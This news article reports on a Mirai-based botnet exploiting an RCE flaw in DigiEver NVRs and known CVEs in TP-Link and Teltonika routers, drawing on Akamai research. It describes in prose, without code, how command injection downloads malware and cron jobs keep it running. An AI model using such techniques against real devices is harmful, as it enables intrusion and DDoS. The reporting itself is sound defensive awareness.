Home » Business » Botnet Exploits NVR and TP-Link Router Vulnerabilities

Botnet Exploits NVR and TP-Link Router Vulnerabilities

New ⁢Mirai Variant Unleashes Wave⁤ of Attacks on IoT devices

A newly discovered Mirai-based botnet is exploiting previously unpatched vulnerabilities in a range of internet-connected devices, including DigiEver DS-2105 Pro Network Video Recorders (NVRs), TP-Link routers, adn Teltonika RUT9XX routers. ‌ The campaign, which began in September ⁤and intensified in November, highlights the ongoing threat posed by⁤ IoT vulnerabilities and the persistent evolution of malware.

The attacks leverage a previously documented, yet unpatched, remote⁣ code ⁣execution (RCE) vulnerability in‌ DigiEver ​NVRs, targeting the ‘/cgi-bin/cgi_main.cgi’ URI. This vulnerability, similar ⁤to one presented⁢ by ⁢TXOne⁣ researcher Ta-Lun Yen at DefCamp 2022 ⁢in Bucharest, Romania, allows attackers to inject malicious commands through improperly validated user inputs. “The issue affects multiple DVR devices,” Yen stated at the conference. A video of his‌ presentation is available⁢ here.

exploiting Multiple Vulnerabilities

Beyond the DigiEver flaw,⁢ this refined Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. This multi-pronged approach⁣ demonstrates the botnet’s‌ adaptability and its operators’ commitment to maximizing ‌their reach.

Akamai researchers,who first ⁤observed the intensified ⁢attacks in mid-November,describe the malware as notable for its use ⁣of XOR and ChaCha20 encryption and its broad⁤ targeting of x86,ARM,and MIPS system architectures. “Although employing complex decryption methods isn’t new, it suggests⁣ evolving tactics, techniques, ​and procedures among Mirai-based botnet operators,” comments Akamai ‌in ‌their report. “This is mostly‍ notable because many Mirai-based botnets still depend on the original string obfuscation ‍logic from recycled code that was included in the original mirai malware source code release,” they add.

The ​Attack Methodology

The ‌attackers utilize​ command injection to download the malware binary from a remote server, establishing ​persistence​ through the addition of‍ cron⁣ jobs. Once compromised,⁤ devices are used for distributed denial-of-service (DDoS) attacks or to further spread the malware using exploit sets and stolen credentials. ⁣This highlights the cascading ⁤effect of a single vulnerability, potentially impacting countless devices and networks.

Indicators of compromise (IoCs) and Yara rules for detection and blocking are available in the Akamai report. The timely patching of ​vulnerabilities and the implementation of ‍robust⁢ security⁢ measures are crucial in mitigating the ‌risk of⁤ such attacks.​ For‌ U.S. consumers, this underscores the ⁤importance of regularly updating firmware on all internet-connected ​devices and ⁤practicing good cybersecurity hygiene.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.